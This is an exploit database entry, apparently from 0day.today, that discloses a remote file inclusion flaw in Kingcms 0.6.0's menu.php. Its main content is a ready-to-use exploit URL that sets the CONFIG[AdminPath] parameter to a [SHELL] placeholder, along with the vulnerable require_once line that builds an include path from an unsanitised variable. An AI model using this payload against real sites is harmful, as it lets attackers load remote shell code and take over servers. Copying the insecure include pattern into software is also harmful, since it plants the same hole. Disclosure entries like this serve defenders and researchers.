Kingcms 0.6.0 (menu.php) Remote File Inclusion Vulnerability

2009-09-01T00:00:00
ID 1337DAY-ID-5721
Type zdt
Reporter CoBRa_21
Modified 2009-09-01T00:00:00

Description

Exploit for unknown platform in category web applications

                                        
                                            ============================================================
Kingcms 0.6.0 (menu.php) Remote File Inclusion Vulnerability
============================================================


-------------------------------------------------------------------------------------
Kingcms v0.6.0 [menu.php] Remote File Inclusion Vulnerability
-------------------------------------------------------------------------------------
 
Author: CoBRa_21
 
Script Download: http://sourceforge.net/projects/kingcms/
 
-------------------------------------------------------------------------------------
 
EXPLOIT:
 
http://localhost/[PATH]/include/engine/content/elements/menu.php? CONFIG[AdminPath] =[SHELL]
 
-------------------------------------------------------------------------------------
BUG:

<?
require_once($CONFIG['AdminPath'] . "/include/engine/folder.php");  



#  0day.today [2018-03-28]  #